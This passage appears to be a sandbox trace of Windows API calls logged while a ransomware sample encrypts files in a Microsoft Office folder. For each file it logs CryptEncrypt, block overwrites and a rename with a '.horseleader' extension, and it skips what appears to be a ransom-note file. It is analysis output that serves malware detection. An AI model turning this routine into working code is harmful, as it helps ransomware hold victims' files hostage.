lpNewFilePointer=0x0) returned 1 [0244.211] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.211] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.211] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.211] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.212] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.212] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.212] CloseHandle (hObject=0x158) returned 1 [0244.212] GetProcessHeap () returned 0x780000 [0244.212] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.212] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE.horseleader") returned 84 [0244.212] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmled.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmled.exe.horseleader")) returned 1 [0244.213] GetProcessHeap () returned 0x780000 [0244.213] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.213] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553f4600, ftCreationTime.dwHighDateTime=0x1cab7c9, ftLastAccessTime.dwLowDateTime=0x593ede30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x553f4600, ftLastWriteTime.dwHighDateTime=0x1cab7c9, nFileSizeHigh=0x0, nFileSizeLow=0xdb80, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSOXMLMF.DLL", cAlternateFileName="")) returned 1 [0244.214] lstrcmpiW (lpString1="MSOXMLMF.DLL", lpString2="Windows") returned -1 [0244.214] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLMF.DLL") returned 72 [0244.214] StrStrIW (lpFirst="MSOXMLMF.DLL", lpSrch=".horseleader") returned 0x0 [0244.214] lstrcmpW (lpString1="MSOXMLMF.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.214] lstrcmpW (lpString1="MSOXMLMF.DLL", lpString2="_uninstalling_.png") returned 1 [0244.214] lstrlenW (lpString=".testttjffg") returned 11 [0244.214] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLMF.DLL", lpSrch=".testttjffg") returned 0x0 [0244.214] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.214] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.214] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLMF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmlmf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0244.214] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3922200, ftCreationTime.dwHighDateTime=0x1ca911d, ftLastAccessTime.dwLowDateTime=0x59413f90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3922200, ftLastWriteTime.dwHighDateTime=0x1ca911d, nFileSizeHigh=0x0, nFileSizeLow=0x124980, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSPTLS.DLL", cAlternateFileName="")) returned 1 [0244.214] lstrcmpiW (lpString1="MSPTLS.DLL", lpString2="Windows") returned -1 [0244.214] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL") returned 70 [0244.214] StrStrIW (lpFirst="MSPTLS.DLL", lpSrch=".horseleader") returned 0x0 [0244.214] lstrcmpW (lpString1="MSPTLS.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.214] lstrcmpW (lpString1="MSPTLS.DLL", lpString2="_uninstalling_.png") returned 1 [0244.215] lstrlenW (lpString=".testttjffg") returned 11 [0244.215] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL", lpSrch=".testttjffg") returned 0x0 [0244.215] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.215] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.215] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msptls.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.219] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL") returned 70 [0244.219] StrStrW (lpFirst="MSPTLS.DLL", lpSrch=".txt") returned 0x0 [0244.220] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1198464) returned 1 [0244.220] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.220] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.222] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.223] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.224] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x8fcc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.224] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.226] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.226] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.226] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x11f980, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.227] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.231] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.232] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.232] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.232] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.232] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.232] CloseHandle (hObject=0x158) returned 1 [0244.232] GetProcessHeap () returned 0x780000 [0244.232] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.233] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL.horseleader") returned 82 [0244.233] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msptls.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msptls.dll.horseleader")) returned 1 [0244.234] GetProcessHeap () returned 0x780000 [0244.234] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.234] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15d97a00, ftCreationTime.dwHighDateTime=0x1caa6a1, ftLastAccessTime.dwLowDateTime=0x6a1819b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x15d97a00, ftLastWriteTime.dwHighDateTime=0x1caa6a1, nFileSizeHigh=0x0, nFileSizeLow=0xac370, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSSOAP30.DLL", cAlternateFileName="")) returned 1 [0244.234] lstrcmpiW (lpString1="MSSOAP30.DLL", lpString2="Windows") returned -1 [0244.234] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL") returned 72 [0244.234] StrStrIW (lpFirst="MSSOAP30.DLL", lpSrch=".horseleader") returned 0x0 [0244.234] lstrcmpW (lpString1="MSSOAP30.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.234] lstrcmpW (lpString1="MSSOAP30.DLL", lpString2="_uninstalling_.png") returned 1 [0244.234] lstrlenW (lpString=".testttjffg") returned 11 [0244.234] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL", lpSrch=".testttjffg") returned 0x0 [0244.234] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.234] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.234] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mssoap30.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.235] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL") returned 72 [0244.235] StrStrW (lpFirst="MSSOAP30.DLL", lpSrch=".txt") returned 0x0 [0244.235] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=705392) returned 1 [0244.235] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.235] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.238] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.238] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.239] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x539b8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.239] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.287] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.287] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.288] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xa7370, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.288] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.290] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.290] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.291] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.291] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.291] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.291] CloseHandle (hObject=0x158) returned 1 [0244.291] GetProcessHeap () returned 0x780000 [0244.291] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.291] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL.horseleader") returned 84 [0244.292] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mssoap30.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mssoap30.dll.horseleader")) returned 1 [0244.293] GetProcessHeap () returned 0x780000 [0244.293] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.293] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8054ff00, ftCreationTime.dwHighDateTime=0x1cb7011, ftLastAccessTime.dwLowDateTime=0xcf459e40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8054ff00, ftLastWriteTime.dwHighDateTime=0x1cb7011, nFileSizeHigh=0x0, nFileSizeLow=0x1a5b, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MUAUTH.CAB", cAlternateFileName="")) returned 1 [0244.293] lstrcmpiW (lpString1="MUAUTH.CAB", lpString2="Windows") returned -1 [0244.293] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB") returned 70 [0244.293] StrStrIW (lpFirst="MUAUTH.CAB", lpSrch=".horseleader") returned 0x0 [0244.293] lstrcmpW (lpString1="MUAUTH.CAB", lpString2="#Decrypt#.txt") returned 1 [0244.293] lstrcmpW (lpString1="MUAUTH.CAB", lpString2="_uninstalling_.png") returned 1 [0244.293] lstrlenW (lpString=".testttjffg") returned 11 [0244.293] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB", lpSrch=".testttjffg") returned 0x0 [0244.293] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.293] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.293] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muauth.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.295] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB") returned 70 [0244.295] StrStrW (lpFirst="MUAUTH.CAB", lpSrch=".txt") returned 0x0 [0244.295] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6747) returned 1 [0244.295] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1a5b, lpOverlapped=0x0) returned 1 [0244.300] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe5a5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.300] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1a5b, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1a5b, lpOverlapped=0x0) returned 1 [0244.301] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.301] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.301] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.301] CloseHandle (hObject=0x158) returned 1 [0244.301] GetProcessHeap () returned 0x780000 [0244.301] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.301] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB.horseleader") returned 82 [0244.301] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muauth.cab"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muauth.cab.horseleader")) returned 1 [0244.302] GetProcessHeap () returned 0x780000 [0244.302] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.302] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8054ff00, ftCreationTime.dwHighDateTime=0x1cb7011, ftLastAccessTime.dwLowDateTime=0xcf47ffa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8054ff00, ftLastWriteTime.dwHighDateTime=0x1cb7011, nFileSizeHigh=0x0, nFileSizeLow=0x6190, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MUOPTIN.DLL", cAlternateFileName="")) returned 1 [0244.302] lstrcmpiW (lpString1="MUOPTIN.DLL", lpString2="Windows") returned -1 [0244.303] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL") returned 71 [0244.303] StrStrIW (lpFirst="MUOPTIN.DLL", lpSrch=".horseleader") returned 0x0 [0244.303] lstrcmpW (lpString1="MUOPTIN.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.303] lstrcmpW (lpString1="MUOPTIN.DLL", lpString2="_uninstalling_.png") returned 1 [0244.303] lstrlenW (lpString=".testttjffg") returned 11 [0244.303] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL", lpSrch=".testttjffg") returned 0x0 [0244.303] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.303] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muoptin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.305] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL") returned 71 [0244.305] StrStrW (lpFirst="MUOPTIN.DLL", lpSrch=".txt") returned 0x0 [0244.305] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=24976) returned 1 [0244.305] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.315] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.315] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.315] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1190, lpOverlapped=0x0) returned 1 [0244.316] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffee70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.316] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1190, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1190, lpOverlapped=0x0) returned 1 [0244.316] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 